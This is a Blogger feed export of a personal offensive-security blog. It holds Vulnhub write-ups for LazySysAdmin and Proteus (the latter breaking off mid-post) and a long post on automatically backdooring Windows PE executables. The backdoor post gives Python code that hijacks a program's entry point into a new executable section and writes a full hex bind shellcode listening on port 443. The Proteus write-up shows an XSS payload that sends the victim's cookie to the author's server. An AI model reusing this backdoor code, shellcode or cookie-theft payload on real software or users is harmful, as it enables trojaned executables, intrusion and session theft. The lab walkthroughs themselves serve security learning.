tag:blogger.com,1999:blog-27341965363790760492024-03-13T20:15:47.694-07:00Gu!d3 t0 0wn4g3Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-2734196536379076049.post-81158296139165599072018-01-29T11:08:00.002-08:002018-01-29T11:10:32.326-08:00My Tryst with Exploitation<div dir="ltr" style="text-align: left;" trbidi="on">Hello Everyone! n1ghtcr4wl3r here...<br />
<br />
I have started preparing for offensive Security Certified Expert (OSCE) and in this post shall be a description as to how I have started honing my skills of binary exploitation.<br />
<br />
<a href="https://tulpa-security.com/" link="https://tulpa-security.com/2017/07/18/288/">Tulpa</a> has been a great help in commencing this journey and so has been <a href="https://www.securitysift.com/">Mike</a> and <a href="https://www.corelan.be/">corelanc0d3r</a> :)<br />
<br />
This post shall be an incremental post and I will describe my journey while exploiting a software called <a href="https://github.com/stephenbradshaw/vulnserver">vulnserver</a><br />
<br />
I will keep adding more content on this post as time goes by.<br />
<br />
Until then see you next time!</div>Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.com0tag:blogger.com,1999:blog-2734196536379076049.post-89561819715876064362017-11-12T10:53:00.001-08:002017-11-12T10:54:15.002-08:000wn!ng LazySysAdmin: 1<div dir="ltr" style="text-align: left;" trbidi="on">
Hi,<br />
<br />
In this post I am going to write on how I owned LazySysAdmin: 1 machine which is hosted on Vulnhub.<br />
<br />
As usual, I start with an arp-scan and discover the target IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-dR2du9-aGSU/WgiT5C358gI/AAAAAAAAKqQ/QOqYWRqEf5MrE1tnUl_7lophJfvi4GZHgCLcBGAs/s1600/arpScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="147" data-original-width="756" height="122" src="https://3.bp.blogspot.com/-dR2du9-aGSU/WgiT5C358gI/AAAAAAAAKqQ/QOqYWRqEf5MrE1tnUl_7lophJfvi4GZHgCLcBGAs/s640/arpScan.PNG" width="640" /></a></div>
<br />
<br />
Next, starts the port-scan.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-7n2JJKqdKHc/WgiUTDUoToI/AAAAAAAAKqU/PTPtVC1H5ycc0tiBciQdKiF_SgZulmZ_QCLcBGAs/s1600/nmapScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="357" data-original-width="537" height="424" src="https://4.bp.blogspot.com/-7n2JJKqdKHc/WgiUTDUoToI/AAAAAAAAKqU/PTPtVC1H5ycc0tiBciQdKiF_SgZulmZ_QCLcBGAs/s640/nmapScan.PNG" width="640" /></a></div>
<br />
I decided to first enumerate the webpage:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-MnFKeDvSS4k/WgiUftezN-I/AAAAAAAAKqc/Yi3xP54VTRU2-w9ZvJ3m1sNZOVXPTjrXgCLcBGAs/s1600/mainPage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1600" height="214" src="https://2.bp.blogspot.com/-MnFKeDvSS4k/WgiUftezN-I/AAAAAAAAKqc/Yi3xP54VTRU2-w9ZvJ3m1sNZOVXPTjrXgCLcBGAs/s640/mainPage.PNG" width="640" /></a></div>
<br />
<br />
Enumeration reveals that wordpress and phpmyadmin is running.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-zpxk1naJEEs/WgiUvJruQOI/AAAAAAAAKqg/RN6JQKR5kkokqygEm6fsc8EXGtV98frQQCLcBGAs/s1600/wordPress.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="753" data-original-width="1143" height="420" src="https://1.bp.blogspot.com/-zpxk1naJEEs/WgiUvJruQOI/AAAAAAAAKqg/RN6JQKR5kkokqygEm6fsc8EXGtV98frQQCLcBGAs/s640/wordPress.PNG" width="640" /></a></div>
<br />
<br />
It is clear that the name of the admin is "togie" which may come to use at a later time.<br />
<br />
Next, I searched through the website and there are files with directory listing, etc but I had hit a roadblock on web service.<br />
<br />
I decided I shall look over to smb ports 139 and 445.<br />
<br />
using smbclient and checked if null sessions are enabled and my guess is correct.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0YTZAT2Y3zM/WgiVURGt6tI/AAAAAAAAKqs/5guCDG-m2ysw6ZLJn48YXuTuIQHazTa9wCLcBGAs/s1600/smbDir.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="690" height="344" src="https://2.bp.blogspot.com/-0YTZAT2Y3zM/WgiVURGt6tI/AAAAAAAAKqs/5guCDG-m2ysw6ZLJn48YXuTuIQHazTa9wCLcBGAs/s640/smbDir.PNG" width="640" /></a></div>
<br />
There are some interesting files here.<br />
<br />
After further digging I have two information points:<br />
<br />
1. in wp-config, we see dbusername and password is present.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-DxIJLH_J4ag/WgiVo9opQYI/AAAAAAAAKqw/5ARAkZRRyP4EsT_niNfWlHXZ7Tb1_Bb0wCLcBGAs/s1600/mysqlPasswd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="636" height="600" src="https://4.bp.blogspot.com/-DxIJLH_J4ag/WgiVo9opQYI/AAAAAAAAKqw/5ARAkZRRyP4EsT_niNfWlHXZ7Tb1_Bb0wCLcBGAs/s640/mysqlPasswd.PNG" width="640" /></a></div>
<br />
2. File deets.txt has a clue:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-7XrJYEwNc4g/WgiV2HIcExI/AAAAAAAAKq4/y2uQl7-XmzU-rVG_5kYS8cWSJmXaKMCIwCLcBGAs/s1600/sshPassword.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="120" data-original-width="765" height="100" src="https://2.bp.blogspot.com/-7XrJYEwNc4g/WgiV2HIcExI/AAAAAAAAKq4/y2uQl7-XmzU-rVG_5kYS8cWSJmXaKMCIwCLcBGAs/s640/sshPassword.PNG" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Now, with username "<b>Admin</b>" and password "<b>TogieMYSQL12345^^</b>" I can login to phpmysql as phpmysql password is same as mysql password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Pv_tk6W5jhg/WgiWbxY2wuI/AAAAAAAAKrA/2EMyNREbP_IqjIaezxJpIDb4ComAg-ZWACLcBGAs/s1600/phpMyAdminLogin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="697" data-original-width="885" height="504" src="https://2.bp.blogspot.com/-Pv_tk6W5jhg/WgiWbxY2wuI/AAAAAAAAKrA/2EMyNREbP_IqjIaezxJpIDb4ComAg-ZWACLcBGAs/s640/phpMyAdminLogin.PNG" width="640" /></a></div>
<br />
Its a <b>lazyAdmin</b> machine so maybe there is a password re-use?<br />
<br />
I tried the same password for wp-admin login and could login:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-KsvBSqeT6Go/WgiWqknX0vI/AAAAAAAAKrE/m3yFLXpkq30_7hm4kZH8nhyronSb1n66wCLcBGAs/s1600/wordpressLogin.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="593" data-original-width="813" height="466" src="https://3.bp.blogspot.com/-KsvBSqeT6Go/WgiWqknX0vI/AAAAAAAAKrE/m3yFLXpkq30_7hm4kZH8nhyronSb1n66wCLcBGAs/s640/wordpressLogin.PNG" width="640" /></a></div>
<br />
Given the mysql password as "<b>TogieMYSQL12345^^" </b>I tried "<b>TogieSSH12345^^" </b>for ssh service but it failed.<br />
<br />
I remember I had the deets.txt I was able to get from smb share.<br />
<br />
With username as "<b>togie</b>" and password "<b>12345</b>" I got ssh shell but it is restricted bash.<br />
<br />
So I tweaked my ssh login to escape the rbash:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-xu9yA3IkgKw/WgiXixqmneI/AAAAAAAAKrU/3rSrRTioxTU1tQB92YBxTd-VIGynW6UfwCLcBGAs/s1600/gainAccessAndRoot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1135" height="252" src="https://2.bp.blogspot.com/-xu9yA3IkgKw/WgiXixqmneI/AAAAAAAAKrU/3rSrRTioxTU1tQB92YBxTd-VIGynW6UfwCLcBGAs/s640/gainAccessAndRoot.PNG" width="640" /></a></div>
<br />
As you can see user "<b>togie</b>" is in sudo group so a sudo -i makes us root user.<br />
<b><br /></b>
Going for the flag:<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8XJiGO_r8jc/WgiX2ljr-qI/AAAAAAAAKrc/9M3lEhncL74bZGXNWzLnXLn952hfot9FQCLcBGAs/s1600/proof.txt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="422" height="640" src="https://4.bp.blogspot.com/-8XJiGO_r8jc/WgiX2ljr-qI/AAAAAAAAKrc/9M3lEhncL74bZGXNWzLnXLn952hfot9FQCLcBGAs/s640/proof.txt.PNG" width="612" /></a></div>
<br />
<b><br /></b>
Conclusion:<br />
<br />
This boot2root was good but could have been a little more challenging, specially privilege escalation.<br />
<br />
Thanks to the author, Togie Mcdogie who put in the efforts to build the machine and to Vulnhub for hosting it.<br />
<br />
-n1ghtcr4wl3r</div>
Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.com0tag:blogger.com,1999:blog-2734196536379076049.post-41921775052122278332017-11-02T10:11:00.000-07:002017-11-02T11:02:42.013-07:00Automating backdoor creation for PE files<div dir="ltr" style="text-align: left;" trbidi="on">Hello,<br />
<br />
In this post I shall write about my experiences/attempt on automating the process of backdoor creation for windows PE(Portable Executable) files.<br />
More than a short and quick success attempt, it been many a failures and frustrations but I made some commendable progress by trying harder.<br />
<br />
<b>I would like to point out that I am not publishing the entire code but giving you an outline as to <i>"how to do it"</i> but will include short code snippets</b><br />
<br />
The post highlights my journey where I faced most issues and spent most times and where I could have done better<br />
<br />
The rough idea for a backdoor is that we need to redirect the code flow at entry point of a PE file to a clean section within the PE file where shellcode is located to do the evil deed and it hand's off control back to the original code execution of the file.<br />
<br />
But we need to talk about the above statement in a detailed manner.<br />
<br />
<b>[+] Getting the entry point of a PE & making a clean section within PE file.</b><br />
<br />
<br />
When loading a program in a debugger(atleast Immunity or Ollydbg), you can see that the program stops just before the main function and asks us if we want to run it further.<br />
<br />
Well that's the entrypoint. It is this address we need to find and more over this post is about automating the entire process so how did I go about doing it?<br />
<br />
Well, when I talk about automating it, I mean pythonizing it.(cuz' thats the best automation language I know)<br />
And well Python comes with a bunch of modules that you can import.<br />
Comes to rescue "pefile" module!<br />
<br />
Reading more about the pe-file structure we come to know that this EntryPoint in a PE file can actually be found from static analysis (ie. not running the PE file) as the PE file has a marked tag which points to the entrypoint.<br />
<br />
Inside PE OPTIONAL_HEADER we find the attribute "AddressOfEntryPoint".<br />
<br />
And in language of Python:<br />
<br />
<code><b><br />
pe = pefile.PE("tempCave.exe")<br />
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint</b><br />
</code><br />
<br />
<br />
However if you compare the output of ep to that of actual address via debugger, you will see that there is an offset. What is this offset?<br />
It turns out that the value if ep is RVA(Relative Virtual Address) but relative to what?<br />
<br />
PE files have ImageBase address which when address to RVA gives the actual Virtual Address which we see on debugger.<br />
Hence I need to do this:<br />
<br />
<code><b><br />
ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase<br />
</b></code><br />
<br />
Now I have the actual entry point address.<br />
Next, I need to get the assembly codes of the instructions which are located just initially at EP.<br />
<br />
In this case, another python module comes to rescue called pydasm!<br />
<br />
After some research over the web, I was able to locate a sensible code that made perfect logic to extract what I required.<br />
<br />
<code><b><br />
save_instr = [] #array to save the instructions<br />
d = {} #dictionary to append the address of instructions to the actual instructions.<br />
<br />
<br />
while offset < len(data):<br />
<span style="white-space: pre;"> </span>i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)<br />
<span style="white-space: pre;"> </span>print "i: " + str(i)<br />
<span style="white-space: pre;"> </span>instr = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)<br />
<span style="white-space: pre;"> </span>save_instr.append(instr)<br />
<span style="white-space: pre;"> </span>interim = str(hex(ep_ava+offset))<br />
<span style="white-space: pre;"> </span>d[interim] = instr<br />
<span style="white-space: pre;"> </span>offset += i.length<br />
</b></code><br />
<br />
The iterator offset basically sets the point from where we shell be reading the instructions and in which mode the instructions need to be decoded (MODE_32).<br />
Also, for the rendering of instructions, in the get_instruction_string, we supply the processor with which we are dealing with (FORMAT_INTEL)<br />
<br />
So, right now I have completed 2 steps towards automation (getting break-point and getting the initial instructions).<br />
<br />
Next up are two more objectives:<br />
<b><br />
[+] Setting up the code cave.<br />
[+] Overwriting the initial instructions to jump to the code cave.<br />
</b><br />
<br />
For setting up the code cave, I had to search for a long time on web (struggle!).<br />
Mostly I was finding only limited editing of a PE file that can done by pefile module of python.<br />
And I found this hidden gem in a reddit thread:<br />
https://www.reddit.com/r/ReverseEngineering/comments/1jpghd/addingremoving_sections_with_python/<br />
<br />
Seems there is indeed hope for editing PE files to add a new section!<br />
<br />
I downloaded the python module into my python directory and was able to get its benefits:<br />
<code><b><br />
sections = SectionDoubleP.SectionDoubleP(pe)<br />
sections.push_back(VirtualSize=0x00001000, RawSize=0x00001000, Characteristics=0xE0000020)<br />
</b></code><br />
<br />
In this code, first I define a section object and next I define the attributes of that section (let me remind you here that the section needs to be "writable" and "executable")<br />
<br />
And hence in the characteristics flag value is defined to be <b>"0xE0000020"</b> for 777 permission.<br />
The virtual Size (again an RVA)attribute tells how large (in bytes) the section should be and push_back pushes this new section at the end of all the PE file sections.<br />
Technically if my PE file starts at <b>0x04000000</b>, then my new section would start at <b>0x40001000</b> in actual virtual address.<br />
<br />
Next I need to overwrite the original instructions with my "hijacking" instruction.<br />
We will need to redirect instruction to the start of our newly made code cave.<br />
<br />
Here I prefer to use a jump(<i>why not a call? 'cuz I hate meddling with stack, that too when I am doing static file modification and have no idea what values registers will be!</i>)<br />
<br />
The trick with jmp <address> which I did not know was that this <address> is always a relative address.<br />
Relative to what?<br />
<br />
Well the <code><b><address> = [dest. address] - [start address] - 5</b></code><br />
dest. address = start address of new PE section that we made<br />
start address = start address of PE file (entrypoint)<br />
-5 = this is the size of jmp instruction in itself to adjust the address.<br />
<br />
Hence a rough code I came up was this:<br />
<code><b><br />
jmp_address = int(dest_address,16) - int(start_address) - 5<br />
jmp_address = hex( struct.unpack( '<L', struct.pack('>L', jmp_address) ) [0] ) [2:] #to make the address in little endian for Intel.<br />
</b></code><br />
All right now we just need to prepend the above generated opcode with jmp opcode "\xe9"<br />
<br />
So we are going to write <b>"\xe9" + "jmp_address"</b> opcodes at the entry point.<br />
While writing to the file, we remember to save the actual legitimate instructions so that we can replay them later.<br />
<br />
code to rewrite the entry point instructions:<br />
<code><b><br />
print "\t[+]overwriting entrypoint with a jump to code cave"<br />
ep_hex = int(ep_hex,16)<br />
for instruction in jmp_opcodes:<br />
<span style="white-space: pre;"> </span>#print "injecting value: " + instruction + " injecting at: " + str(ep_hex)<br />
<span style="white-space: pre;"> </span>instruction = int(instruction,16)<br />
<span style="white-space: pre;"> </span>status = pe.set_bytes_at_rva(ep_hex,chr(instruction))<br />
<span style="white-space: pre;"> </span>if(status is False):<br />
<span style="white-space: pre;"> </span>print "[!]entry point hijacking failed..."<br />
<span style="white-space: pre;"> </span>ep_hex = ep_hex + 1<br />
</b></code><br />
Next once the entry point has been overwritten with jmp <new_PE_section_address> we can change the instructions in the new clean PE section with first saving the registers and flags (pushad,pushfd) and then writing the shellcode.<br />
<br />
Here I used an alphanumeric bind shellcode that binds to port 443.<br />
Now here I know its not true automation to have a hardcoded shellcode but maybe thats for version 1.1 (as an improvement?)<br />
<br />
<b>shellcode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a085950e2fd4050405068ea0fdfe0ffd59768020001bb89e66a10565768c2db3767ffd55768b7e938ffffd5576874ec3be1ffd5579768756e4d61ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e0905690ff306808871d60ffd5bbfe0e32ea68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5"<br />
</b><br />
<div><br />
</div><div>I would like to remind here that the above shellcode has been backdoorified (in the sense that there is a wait for infinite time when a value of -1 is pushed onto the stack)</div><div><br />
</div><div>I have changed the opcodes above such that the bind works without hampering the execution of original program (which we are backdooring).</div><div><br />
</div><div>So, with our shellcode cleanly written using the code:</div><div><br />
<code><b><br />
</div><div><div>shellcode_len = len(shellcode)</div><div>write_code = []</div><div><br />
</div><div>#making instruction list</div><div>for i in range(0,shellcode_len,2):</div><div><span style="white-space: pre;"> </span>write_code.append(shellcode[i:i+2])</div><div><br />
</div><div>number_of_instructions = len(write_code)</div><div><br />
</div><div>#setting EIP to the next memory location to write[robed = name of new PE section that I made]</div><div>robed_VA = robed_VA + 1</div><div><br />
</div><div>#writing shellcode</div><div>count = 0</div><div>while(number_of_instructions > 0):</div><div><span style="white-space: pre;"> </span>pe.set_bytes_at_rva(robed_VA, chr(0x9c))</div><div><span style="white-space: pre;"> </span>shellcode_instruction = "0x" + write_code[count]</div><div><span style="white-space: pre;"> </span>shellcode_instruction = int(shellcode_instruction, 16)</div><div><span style="white-space: pre;"> </span>status = pe.set_bytes_at_rva(robed_VA,chr(shellcode_instruction))</div><div>#<span style="white-space: pre;"> </span>print "injecting value: " + str(hex(shellcode_instruction)) + " injecting at: " + str(hex(robed_VA))</div><div>#<span style="white-space: pre;"> </span>print status</div><div><span style="white-space: pre;"> </span>robed_VA = robed_VA + 1<span style="white-space: pre;"> </span>#increment to next instruction pointer</div><div><span style="white-space: pre;"> </span>count = count + 1 <span style="white-space: pre;"> </span>#increment the write_code counter to write the next instruction of shellcode</div><div>#<span style="white-space: pre;"> </span>if count> 10:</div><div>#<span style="white-space: pre;"> </span>break</div><div><span style="white-space: pre;"> </span>number_of_instructions = number_of_instructions - 1 #decrement number_of_instructions until zero to stop while loop</div><div>print "[+]Shellcode successfully written"</div></div><div></b></code><br />
</div><div>We will now proceed to save the file.</div><div><br />
</div><div>#code</div><div><code><b><br />
pe.write(filename="tmp.exe")</div></b></code><div><br />
</div><div>Now, this saved PE file has the initial address hijacked and registers and flags (pushad, pushfd) saved and shellcode written on hijacked address.</div><div><br />
</div><div>We have now three more points to cover:</div><div><b><br />
[+] Post shellcode execution, adjust ESP to initial ESP </div><div>[+] pop the initial registers and flags(popfd, popad [since stack is FILO structure])</div><div>[+] Writing the initial instructions which were saved to make actual program run normally</div></b><div><br />
</div><div>The adjusting the ESP was the biggest hindrance and I spent three days fighting how can I adjust esp to a value while doing static file analysis and editing.</div><div><br />
</div><div>It quickly became clear to automate this step I will need some extra juice!</div><div><br />
</div><div><br />
</div><div><b><br />
[*] Here comes Dynamic analysis via Python</div></b><div><br />
</div><div>Immunity could not be automated unless I am explictly running pycommand and I could not find any suitable way to run pycommands in a python script without running Immunity.</div><div>For ollydbg I could not find any integration in python.</div><div><br />
</div><div>Running through multiple blogs and asking questions here and there (no answers!), I came upon a thread which talked about <b>pykd python module and windbg integration.</b></div><div><br />
</div><div>But I must say, pykd is documented much in Russian and I had to read quite a while to get some hold of it to meet my needs for automation.</div><div><br />
</div><div>And here comes the code which made adjusting esp successful.</div><div><code><b><br />
</div><div><br />
[+] Saving initial ESP:</div><div><br />
</div><div><div>pykd.startProcess(fileName)</div><div>print "[+]setting entry point breakpoint"</div><div>pykd.dbgCommand("bp $exentry")</div><div>print "[+]stepping into breakpoint"</div><div>pykd.dbgCommand("g")</div><div>print "[+]Fetching address of esp @entryPoint"</div><div>#print "[+]" + str(pykd.dbgCommand("r esp"))</div><div>initial_esp = str(pykd.dbgCommand("r esp"))</div><div>#print type(initial_esp)</div><div>initial_esp = initial_esp.split("=")[1]</div><div>#print "splitted..." + initial_esp</div><div>initial_esp = "0x"+initial_esp</div><div>print "[+]Initial ESP: " + initial_esp</div><div>initial_esp = int(initial_esp,16)</div></div><div></b></code><br />
</div><div><b><br />
[+] Getting the final ESP (breakpoint at where the shellcode ends [can be calulated via the length of shellcode])</div></b><div><br />
</div><div><div><code><b><br />
print "[+]Starting the temporary executable which we had saved earlier"</div><div>pykd.startProcess("tmp.exe")</div><div>print "\t[+]setting final breakpoint"</div><div>bpCmd = "bp " + final_eip</div><div>pykd.dbgCommand(bpCmd)</div><div>print "\t[+]stepping into breakpoint"</div><div>print "\t[+]make a connection to the host at port 443"</div><div>print "\t[+]waiting..."</div><div>pykd.dbgCommand("g")</div><div>print "\t[+]Fetching address of esp @entryPoint"</div><div>print "\t[+]" + str(pykd.dbgCommand("r esp")).replace("=",":")</div><div>final_esp = str(pykd.dbgCommand("r esp"))</div><div>print final_esp</div><div>print "[+]processing esp..."</div><div>final_esp = final_esp.split("=")[1]</div><div>final_esp = "0x"+final_esp</div><div>final_esp = int(final_esp,16)</div><div>print "\t[+]Final esp: " + str(final_esp)</div></div><div></b></code><br />
<br />
</div><div>And I got out of the seemingly tight spot as to how to calculate the ESP.</div><div><br />
</div><div>Next up is simple as to add esp, <esp address difference></div><div>and then writing popfd, popad.</div><div><br />
</div><div>Now for replaying the initial instructions, remember we saved them?</div><div><br />
</div><div>We will now write these just after the popad (which is the last instruction).</div><div>The replaying of original instructions could be a little complicated however, since the address was saved for each initial instruction, I was able to write the initial "original" push instruction and write the address of the original "call" instruction to redirect to original code flow.</div><div><br />
</div><div>But this part certainly needs to have a more generic approach from my part.</div><div><br />
</div><div>With this, I shall end this long post.</div><div>Though many of you guys might find this redundant and the cod/logic may be hugely un-optimized but I wanted to share as to how I did it in my path of struggle (<b><i>call it blabbering :P</b></i>)</div><br />
<b>- nightcr4wl3r</b></div>Angkanhttp://www.blogger.com/profile/18370393056318837500noreply@blogger.comtag:blogger.com,1999:blog-2734196536379076049.post-46253671800979915172017-07-01T06:19:00.002-07:002017-07-01T06:19:46.156-07:00Proteus Pwn4g3<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;">Hi Everyone,</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Over this blogpost, I shall write about how I cracked a recently hosted challenge on vulnhub named "Proteus".</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Looking at the machine description over Vulnhub:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://2.bp.blogspot.com/-45BfFiUfSJc/WVeQ5yMJt_I/AAAAAAAAKew/7cNYe0I9xDAaztcBZaO4_k2OgaoXFBhlwCK4BGAYYCw/s1600/proteus.PNG" imageanchor="1"><img border="0" height="209" src="https://2.bp.blogspot.com/-45BfFiUfSJc/WVeQ5yMJt_I/AAAAAAAAKew/7cNYe0I9xDAaztcBZaO4_k2OgaoXFBhlwCK4BGAYYCw/s640/proteus.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The machine simulates an environment where you can upload executable files and performs malware analysis over it.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I download the OVA and setup my kali and vulnerable machine on the same network.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">First and foremost, network discovery:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://1.bp.blogspot.com/-iv5XHu2XSpE/WVeSHFafmpI/AAAAAAAAKe8/Yabv6P7Tp-AyH-PIXQJUM8yaSUx5P0sKgCK4BGAYYCw/s1600/net_disco.png" imageanchor="1"><img border="0" height="314" src="https://1.bp.blogspot.com/-iv5XHu2XSpE/WVeSHFafmpI/AAAAAAAAKe8/Yabv6P7Tp-AyH-PIXQJUM8yaSUx5P0sKgCK4BGAYYCw/s640/net_disco.png" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So the IP I shall be targeting is 192.168.137.250</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I ran nmap and two services stand out:</span><br />
<span style="background-color: white;">1. ssh ==> port 22</span><br />
<span style="background-color: white;">2. http ==> port 80</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://1.bp.blogspot.com/-7W0zQaQxjf4/WVeSud8yAtI/AAAAAAAAKfI/hnJQUnzQfJY5bmTwTojXQNAHS11x4luSgCK4BGAYYCw/s1600/nmapTcp.png" imageanchor="1"><img border="0" height="204" src="https://1.bp.blogspot.com/-7W0zQaQxjf4/WVeSud8yAtI/AAAAAAAAKfI/hnJQUnzQfJY5bmTwTojXQNAHS11x4luSgCK4BGAYYCw/s640/nmapTcp.png" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I tried checking over ssh but it seems only key based login is allowed.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I shifted my focus over to port:80</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://2.bp.blogspot.com/-sTNPkgcEgsM/WVeTQMoQAqI/AAAAAAAAKfQ/18OWKLdIvH43bHkgLL4KlR4IBZx28jNJQCK4BGAYYCw/s1600/webpage.PNG" imageanchor="1"><img border="0" height="272" src="https://2.bp.blogspot.com/-sTNPkgcEgsM/WVeTQMoQAqI/AAAAAAAAKfQ/18OWKLdIvH43bHkgLL4KlR4IBZx28jNJQCK4BGAYYCw/s640/webpage.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Immediately striking are two things:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">1. File upload feature</span><br />
<span style="background-color: white;">2. Login functionality</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">It seemed that the file upload is based on mime type and only executable file or sharedlib types are supported for uploads.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">First I tried uploading a normal file and as an output we get binary analysis of the file.</span><br />
<span style="background-color: white;">Checking the output I see that all the ascii strings inside the binary file are rendered as is on the webpage.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This could be the first foothold. Probably html special characters are not escaped!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I immediately inject the following code into a binary file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<b>I am here</b>" >> bFile</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">bFIle is the binary/executable file</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">and dang! we have html rendered on page :D</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So now we have a clear case of XSS so my next thought was if there is XSS, could there be another client visiting the page other than myself!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I uploaded another file and this time with an iframe injection such that I points to my evil server:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<iframe src='http://myIP'></iframe>" >> binaryFile</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And I upload this binaryFile.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">On my local machine I keep monitoring my apache access logs and dang! second foothold!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I clearly see PhantomJS web automation trying to access my apache server from Proteus machine.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Now connecting the dots, I see myself logged as anonymous user and if there is another person visiting the webiste locally on the Proteus machine, could it be the site administrator??</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Time for cookie stealing again thanks to XSS!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I inject the following payload to the binary file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<script><span style="color: #242729; font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace, sans-serif; font-size: 13px; white-space: pre-wrap;">document.write('<img src=\"http://myIP?c=' + document.cookie + '\" />')</script>" >> binaryFile</span></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And I wait quitely over my evil server (evil Laugh hehehe)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And voila! cookie stolen!</span><br />
<span style="background-color: white;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-FFp95wIwOUg/WVebg5VVF6I/AAAAAAAAKfg/T-eWgNIvxUYoUWWo3eIfGczdiE3My06agCK4BGAYYCw/s1600/stealing_session.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white;"><img border="0" height="73" src="https://2.bp.blogspot.com/-FFp95wIwOUg/WVebg5VVF6I/AAAAAAAAKfg/T-eWgNIvxUYoUWWo3eIfGczdiE3My06agCK4BGAYYCw/s640/stealing_session.PNG" width="640" /></span></a></div>
